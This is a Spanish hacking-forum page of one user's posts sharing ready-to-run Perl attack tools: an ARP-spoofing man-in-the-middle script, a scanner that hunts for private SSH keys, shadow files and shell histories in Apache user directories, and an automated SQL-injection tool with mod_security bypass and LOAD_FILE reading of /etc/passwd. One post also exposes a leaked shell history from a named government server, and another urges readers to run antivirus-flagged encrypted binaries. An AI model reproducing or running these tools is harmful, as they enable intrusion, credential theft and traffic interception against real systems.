elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Hacking / Re: Perl ARP-Spoofer v0.2 en: 4 Febrero 2011, 23:17 pm
Gracias a las ideas de averno saco la v0.2  ;D

v0.2:

  • IPTables forwarding añadido (gracias averno)
  • Restauración de mac's originales y forwarding
  • Mas info en ejecucion
Screenshot:




Wireshark dump:




Code:

Código:
#!/usr/bin/perl

# Perl ARP-Spoofer By Login-Root
# Long life Camacho Tequila
# 2011 shit
# Run it as root

# Net::ARP & Net::Ping requerido
use Net::ARP;
use Net::Ping;

if ($< != 0)
{
print "\n[!] Run it as root\n\n";
exit(0);
}

if(!$ARGV[2])
{
print "\n###########################################";
print "\n# Perl ARP-Spoofer v0.2 | Login-Root Pwnz #";
          print "\n###########################################";
print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n";
          exit(0);
}

sub finaliza
{
print "\n\n[!] Restaurando cache ARP de host's remotos\n";

print "\n[+] $host1 is-at $mac1 (to $host2)";
Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply');
print "\n[+] $host2 is-at $mac2 (to $host1)";
Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');

print "\n\n[!] Deshabilitando forwarding...";

open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
print FORWD "0";
close(FORWD);

system("iptables -P FORWARD DROP");

print "\n[!] Saliendo...\n\n";
exit(0);
}

($dev, $host1, $host2) = @ARGV;

print "\n[+] Perl ARP-Spoofer v0.2 starting | Login-Root [+]\n";

$lmac = Net::ARP::get_mac($dev);

print "\n[!] MAC Local : $lmac";

my $ping = Net::Ping->new('icmp');
   $ping->ping($host1, 2);
   $ping->ping($host2, 2);

$mac1 = Net::ARP::arp_lookup($dev,$host1);
$mac2 = Net::ARP::arp_lookup($dev,$host2);

print "\n[!] MAC Host 1: $mac1";
print "\n[!] MAC Host 2: $mac2";

print "\n\n[!] Habilitando forwarding...";

open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
print FORWD "1";
close(FORWD);

# (thnx averno)
system("iptables -P FORWARD ACCEPT");

print "\n\n[!] Comenzando ARP-Spoofing entre $host1 & $host2, Ctrl-C para finalizar...\n";

while(1)
{
        $SIG{INT} = \&finaliza;
sleep(1);
print "\n[+] $host1 is-at $lmac (to $host2)";
Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply');
print "\n[+] $host2 is-at $lmac (to $host1)";
Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply');

}

__END__
2  Seguridad Informática / Hacking / Re: Perl ARP-Spoofer v0.1 en: 4 Febrero 2011, 17:27 pm
Mi idea es hacer una simple demostración de arp spoofing en perl, no reinventar la rueda rehaciendo la suite dsniff ;-)

Saludos
3  Seguridad Informática / Hacking / Perl ARP-Spoofer v0.2 en: 3 Febrero 2011, 08:48 am
Simple ARP-Spoofer escrito en Perl, recien salido del horno, espero que les guste / sirva :P

v0.2:

  • IPTables forwarding añadido (gracias averno)
  • Restauración de mac's originales y forwarding
  • Mas info en ejecucion
Screenshot:




Wireshark dump:




Code:

Código:
#!/usr/bin/perl

# Perl ARP-Spoofer By Login-Root
# Long life Camacho Tequila
# 2011 shit
# Run it as root

# Net::ARP & Net::Ping requerido
use Net::ARP;
use Net::Ping;

if ($< != 0)
{
print "\n[!] Run it as root\n\n";
exit(0);
}

if(!$ARGV[2])
{
print "\n###########################################";
print "\n# Perl ARP-Spoofer v0.2 | Login-Root Pwnz #";
          print "\n###########################################";
print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n";
          exit(0);
}

sub finaliza
{
print "\n\n[!] Restaurando cache ARP de host's remotos\n";

print "\n[+] $host1 is-at $mac1 (to $host2)";
Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply');
print "\n[+] $host2 is-at $mac2 (to $host1)";
Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');

print "\n\n[!] Deshabilitando forwarding...";

open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
print FORWD "0";
close(FORWD);

system("iptables -P FORWARD DROP");

print "\n[!] Saliendo...\n\n";
exit(0);
}

($dev, $host1, $host2) = @ARGV;

print "\n[+] Perl ARP-Spoofer v0.2 starting | Login-Root [+]\n";

$lmac = Net::ARP::get_mac($dev);

print "\n[!] MAC Local : $lmac";

my $ping = Net::Ping->new('icmp');
   $ping->ping($host1, 2);
   $ping->ping($host2, 2);

$mac1 = Net::ARP::arp_lookup($dev,$host1);
$mac2 = Net::ARP::arp_lookup($dev,$host2);

print "\n[!] MAC Host 1: $mac1";
print "\n[!] MAC Host 2: $mac2";

print "\n\n[!] Habilitando forwarding...";

open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
print FORWD "1";
close(FORWD);

# (thnx averno)
system("iptables -P FORWARD ACCEPT");

print "\n\n[!] Comenzando ARP-Spoofing entre $host1 & $host2, Ctrl-C para finalizar...\n";

while(1)
{
        $SIG{INT} = \&finaliza;
sleep(1);
print "\n[+] $host1 is-at $lmac (to $host2)";
Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply');
print "\n[+] $host2 is-at $lmac (to $host1)";
Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply');

}

__END__
4  Seguridad Informática / Hacking / Re: [!] Apache Files Finder en: 11 Octubre 2010, 18:26 pm
Dependiendo de la configuración del Apache, acceden al public_html o no. Y creeme que he encontrado archivos interesantes de esta forma, hay muchos usuarios que montan webs vulnerables o depositan archivos importantes en su public_html, creyendo que nadie se los puede leer, y bueno despues son vulnerados.

Te dejo un ejemplo ;) (que hace .bash_history ahi si es el public_html ¿¿??):

http://sitl.diputados.gob.mx/.bash_history



Contenido:

Código:
pwd
ls -la
pwd
ls
cd recepcion_diputados
ls
cd cuestionario
exit
df -k
top
id
su
id
su
id
ls
clear
df -k
ls
cd /
ls
cd var/
ls
cd local/
ls
ls
find / -name htdocs
su
clear
ls
su
printenv
NLS_LANG=AMERICAN_AMERICA.WE8ISO8859P1
export NLS_LANG
printenv
su
exit
su
su
su
exit
date
date
su root
exit
pwd
cls
pwd
pass

(Lindo disclosure de comandos y directorios, genial para obtener información adicional)

;)
5  Seguridad Informática / Hacking / [!] Apache Files Finder en: 11 Octubre 2010, 01:58 am
Este script básicamente lo que realiza es buscar archivos/carpetas interesantes en las home`s de algun servidor que corra Apache (Y tenga la opción de acceso con ~, es decir, se permita acceder a http://www.website.com/~nombreusuario/). Para ello se necesitan de dos archivos de texto, el primero, con la lista de usuarios a probar (que podremos haber sacado por brute-force, mediante LFI, LOAD_FILE, etc.), y segundo, la lista con directorios a probar en cada uno de los home`s de cada usuario.

Ejemplos:


users.txt

Código:
root
ftp
mysql
bin
daemon
ibsoc
ifsca
aminen
dpisf
idsum
ieduc
ivivi
itcp
sergio
juan
backup
imosp
publish
gbrusa
igobi
iforo
ispyc
amoran
mysqldump
mesaadm
sinrespuesta
amgarcia
mcabrera
boletinoficial
dsum
improd
patricia
mauro
agostina
lucila
hyperic
nagios
clamav


dirs.txt

Código:
index.htm
index.html
index.php
.bash_history
.bashrc
.ftpquota
.gbent
.grc
.gui
.host
.hosts
.jpilot
.master
.members
.mysql_history
.net
.nsconfig
.pass
.passes
.pwd
.ssh/
.ssh/know_hosts
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/id_rsa.priv
.ssh/id_rsa.key
host
hosts
passwd
shadow


Funcionamiento:




Salida (results.html):



Code:

Código:
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;

if(!$ARGV[3])
    {
        print "\n\n#####################################";
        print "\n# Apache Files Finder By Login-Root #";
        print "\n#####################################";
        print "\n\nUso: perl $0 [WEBSITE] [USERS LIST] [DIRECTORY LIST] [PATH TO SAVE (HTML)]";
        print "\nEx : perl $0 http://www.website.com users.txt dirs.txt results.html\n\n";
        exit(0);
    }

$ua = LWP::UserAgent->new;
$ua->agent("Google Bot");

($web, $users, $dirs, $save) = @ARGV;

if ( $web   !~   /^http:/ )
  {
      $web = "http://" . $web;
  }

open USERS, $users;
open SAVE, ">>$save";

print "\n[!] Scanning $web for files in users, saving in $save\n\n";

foreach $lista(<USERS>)
{
    chomp($lista);
    open DIRS, $dirs;
    foreach $dir(<DIRS>)
    {
        chomp($dir);
        $host = $web.`/~`.$lista.`/`.$dir;
        $req = HTTP::Request->new(GET => "$host");
        $res = $ua->request($req);
        $result = $res->code;
        if ($result != 404 and $result != 403)
        {
            print "\n".$res->status_line.": $host";
            print SAVE $res->status_line.` : <a href="`.$host.`" TARGET="_new">`.$host.`</a><br>`;
        }
    }
    close(DIRS);
}

print "\n";
close(USERS,SAVE);

__END__
6  Seguridad Informática / Nivel Web / Re: SQL-PwnZ v1.5 [NEW] [Mix Collations & mod_security Bypass] en: 7 Abril 2010, 00:08 am
Gracias por ser el unico en comentar aqui, prometo agregarlo en futuras versiones :)

Saludos.
7  Seguridad Informática / Nivel Web / SQL-PwnZ v1.5 [NEW] [Mix Collations & mod_security Bypass] en: 6 Abril 2010, 09:11 am
Nuevo:

  • Agregado mod_security Bypass.
  • Agregado Illegal Mix Of Collations Bypass.
  • Agregadas más tablas para bruteforce.
  • Agregadas más columnas para bruteforce.
  • Código interno mejorado.
  • Bugs Fixeados.
Sitio con mod_security activado:




SQL-PwnZ: Bypasseando





Salida:






Sitio con Illegal Mix Of Collations:




SQL-PwnZ: Bypasseando




Salida:






Código:


Código:
#!/usr/bin/perl

##################################################################################################################
#                                  -[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-                                   ###
##################################################################################################################

##################################################################################################################
# [+] inf0:                                                                                                    ###
##################################################################################################################
# Busca:                                                                                                       ###
# ======                                                                                                       ###
#  - Nº de columnas                                                                                            ###
#  - Information_Schema && MySQL.User                                                                          ###
#  - LOAD_FILE                                                                                                 ###
#  - Tablas                                                                                                    ###
#  - Columnas                                                                                                  ###
#  - Illegal Mix Of Collations Bypass && mod_security Bypass                                                   ###
#                                                                                                              ###
#  ...y guarda todo en un archivo de texto.                                                                    ###
#                                                                                                              ###
##################################################################################################################

##################################################################################################################
# [+] Use:                                                                                                     ###
##################################################################################################################
# perl sqlpwnz.pl [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS] ###
#   [WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]                                      ###
#   [COLUMNAS]: Limite de columnas                                                                             ###
#   [ARCHIVO]: Archivo donde guardar web vulnerable                                                            ###
#   [COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)                                                    ###
#   [-TB]: Intentar brutear tablas (Opcional)                                                                  ###
#   [-CL]: Intentar brutear columnas (Opcional)                                                                ###
#   [-NOCHECK]: No hacer el chequeo inicial (Opcional)                                                         ###
#   [-MOD_FUCK]: Activar mod_security Bypass (Opcional)                                                        ###
#   [-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)                                         ###
##################################################################################################################

##################################################################################################################
# [+] c0ntact:                                                                                                 ###
##################################################################################################################
# MSN:    no.more@passport.com                                                                                 ###
# E-Mail: login_root@yahoo.com.ar                                                                              ###
##################################################################################################################

##################################################################################################################
# [+] sh0utz:                                                                                                  ###
##################################################################################################################
# Greetz: KiKo ; VanHan ; [Dead] Knet ; Ricota ; InyeXion ; OxOnO ; Matt ; r0dr1 ; oceanik6 ; OzX ; yoyahack   ###
# VISIT: WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                                                         ###
##################################################################################################################

use HTTP::Request;
use LWP::UserAgent;

if(!$ARGV[2])
{
print "\n\n-[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-\n=========================================";
print "\n\nUso: perl $0 [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS]\n";
print "\n[WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]\n[COLUMNAS]: Limite de columnas\n[ARCHIVO]: Archivo donde guardar web vulnerable\n[COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)\n[-TB]: Intentar brutear tablas (Opcional)\n[-CL]: Intentar brutear columnas (Opcional)\n[-NOCHECK]: No hacer el chequeo inicial (Opcional)\n[-MOD_FUCK]: Activar mod_security Bypass (Opcional)\n[-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)\n\n";
exit (0);
}

@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users',
  'name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios',
  'miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores',
  'administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user',
  'user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name',
  'member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre',
  'user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth',
  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio',
  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head',
  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users',
  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente',
  'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes',
  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos',
      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','web_users','curso',
      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead',
      'associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users',
      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users','tb_usuarios',
      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','tb_usuario',
  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha',
          'username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente',
          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario',
          'login_id','usr','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username',
          'sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave',
  'membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password',
          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
          'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

($host, $columnas, $savelist) = @ARGV;

$agent = LWP::UserAgent->new;
$agent->agent("Google Bot");

if ( $host   !~   /^http:/ )
  {
      $host = "http://" . $host;
  }

for ($numarg = 0 ;  $numarg <= $#ARGV ; $numarg++)
{
$argumentos.= $ARGV[$numarg];
}

if ($argumentos =~ /-MIX_BYPASS/i)
{
print "\n[+] MIX_BYPASS ACTIVADO";
$hexin = "unhex(hex(";
$hexend = "))";
}
if ($argumentos !~ /-MOD_FUCK/i)
{
if ($argumentos =~ /--/)
{
$cmn= "+";
$cfin="--";
print "\n[+] Comentarios a utilizar: '--' & '+'";
}
else
{
$cmn= "/**/";
$cfin= "/*";
print "\n[+] Comentarios a utilizar: '/*' & '/**/'";
}
}
else
{
print "\n[+] MOD_FUCK ACTIVADO, se ignoran comentarios. Utilizando: '+'. Bypass: '/*!' & '*/'";
$bypass = "+/*!";
$cmn= "+";
$cfin= "*/";
}

open(WEB,">>".$savelist) || die "\n\n[-] Imposible crear el archivo de texto\n";
if ($argumentos =~ /-NOCHECK/i)
  {
      print "\n[!] Se omite el chequeo inicial...\n";
      print WEB "[WEBSITE]:\n\n$host\n";
  }
else
  {
      print "\n[!] Chequeando si la web es vulnerable...\n";
      $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cfin));
      $response = $sql->content();
      if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /error de sintaxis al final de la entrada/ || $response =~ /Unknown column/)
        {
            print "[+] Web vulnerable, continua el script...\n";
            print WEB "[WEBSITE]:\n\n$host\n";
        }
        else
          {
            print "[-] Website aparentemente no vulnerable a SQL Inyection, intentar con otro comentario o con -NOCHECK activado\n\n";
    close(WEB);
            exit(0);
          }
  }
print "\n[!] Buscando columnas...\n";
for ($column = 1 ; $column <= $columnas ; $column ++)
{
$UNION.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
    if ($column == 1)
      {
          print WEB "\n[COLUMNAS]:\n\n";
          $inyection = '';
          $UNION = '';
      }
    $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin));
    $response = $sql->content();
    if($response =~ /loginpwnz/)
      {
         print "[+] La web posee $column columnas\n\n";
         $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cfin;
         print "$sql\n";
         print WEB "$sql\n";
         print "\n[!] Chequeando si existe Information_Schema...";
         $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."information_schema.tables".$cfin));
         $response = $sql->content();
         if($response =~ /loginpwnz/)
          {
          print "\n[+] Information_Schema disponible...guardando en $savelist";
            $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."information_schema.tables".$cfin;
            print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
           
          }
         else
          {
            print "\n[-] Information_Schema no disponible";
          }
         print "\n[!] Chequeando si existe MySQL.User...";
         $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."mysql.user".$cfin));
         $response = $sql->content();
         if($response =~ /loginpwnz/)
          {
          print "\n[+] MySQL.User disponible...guardando en $savelist";
          $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."mysql.user".$cfin;
            print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
           
          }
         else
          {
            print "\n[-] MySQL.User no disponible";
          }
while ($loadcont < $column-1)
   {
$loadfile.=','.$hexin.'LOAD_FILE(0x2f6574632f706173737764)'.$hexend;
$loadcont++;
   }
print "\n[!] Chequeando si es posible inyectar LOAD_FILE...";
$sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."LOAD_FILE(0x2f6574632f706173737764)".$hexend.$loadfile.$cfin));
    $response = $sql->content();
    if($response =~ /root:x:/)
          {
          print "\n[+] LOAD_FILE disponible...guardando en $savelist";
          print WEB "\n\n[LOAD_FILE]:\n\n$hexinLOAD_FILE(0x2f6574632f706173737764)$hexend => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
          }
         else
          {
            print "\n[-] LOAD_FILE no disponible";
          }
if ($argumentos =~ /-TB/i)
          {
              print "\n\n[!] Bruteando tablas...";
              print WEB "\n\n[TABLAS]:\n\n";
              foreach $tabla(@nombretabla)
                {
                  chomp($tabla);
                  $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn.$tabla.$cfin));
                  $response = $sql->content();
                  if($response =~ /loginpwnz/)
                    {
                        print "\n[+] La tabla $tabla esta disponible...guardando en $savelist";
                        $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn.$tabla.$cfin;
                        print WEB "$sql\n";
                    }
                }
            }
        if ($argumentos =~ /-CL/i)
          {
          print "\n\n[!] Tabla a la cual brutear columnas: ";
            $tabla=<STDIN>;
            chomp($tabla);
            print WEB "\n\n[COLUMNAS EN $tabla]:\n\n";
            foreach $columna(@nombrecolumna)
            {
             chomp($columna);
             $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$hexend.$inyection.$cmn."FROM".$cmn.$tabla.$cfin));
             $response = $sql->content();
             if ($response =~ /loginpwnz/)
                  {
                      print "\n[+] La columna $columna esta disponible...guardando en $savelist";
                      print WEB "$hexin$columna$hexend\n";
                  }
            }
        }
        print WEB "\n\n\n[*EOF*]";
        print "\n\n[+] Todo salvado correctamente en $savelist\n\n";
        print "## c0ded by Login-Root | 2010 ##\n\n";
close(WEB);
        exit (0);
      }
}
print "[-] Imposible encontrar numero de columnas, intentar con mas columnas\n\n";
print "## c0ded by Login-Root | 2010 ##\n\n";
close(WEB);
exit (0);


Sitio:

http://sourceforge.net/projects/sqlpwnz/
8  Seguridad Informática / Hacking / Re: Shell-Run | IPFilter - By VanHan en: 12 Febrero 2010, 02:41 am
Para que no lo desamblen y vean el source ;)
9  Seguridad Informática / Hacking / Shell-Run | IPFilter - By VanHan en: 11 Febrero 2010, 03:14 am
Aca les dejo dos programitas que hizo un amigo mio, VanHan, cuando fui a la casa y le pedi que me los programara (si, soy un vago terrible :P)

Shell-Run:

Un simple launcher, lo uso para cuando estoy en Windows y quiero ejecutar codes (python, perl, etc), rapidamente. Ponen el comando (python, perl, el que quieran), el lugar del archivo, abajo los argumentos y listo.






Si quieren lo pueden minimizar a la tray y dejarlo corriendo en segundo plano:




Download (Multiple mirrors):

http://massmirror.com/16b7214f1832d3682193b0b86d3a45db.html


:-------------------------------------------------------------:

IPFilter:

Este es mas completito, sirve para filtrar los numeros, fechas, puntos, etc de los siguientes servidores de Reverse IP:



Vamos por ejemplo, a usar la primera, http://www.ip-adress.com/reverse_ip

Ponemos la IP o el dominio y damos a Enter. Copiamos todos los dominios de esa respectiva IP.



Los pegamos en el programa (Fijense que este bien seleccionado www.ip-adress.com) y le damos a filtrar.



Listo! Filtrados. :D



Dando click a Guardar guarda el texto filtrado en el archivo "Ips.txt".

Download (Multiple mirrors):

http://massmirror.com/675283888b9ba458430631f4564a5fe3.html

Ah, me olvidaba...antes que me digan: LOGIN-ROOT ESTO ESTA TROYANIZADO !, les digo que NO, solo estan cifrados, por eso les salta el AV. Ejecutenlo en una PC Virtual, sniffen las conexiones con Wireshark, hagan lo que quieran. Los codes estan 100% limpios.


Saludos.
10  Programación / Scripting / Re: The Blind Fox v0.5 | By Login-Root en: 12 Octubre 2008, 00:05 am
Busca acerca de Blind MySQL Inyection  ;D


Saludos.
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines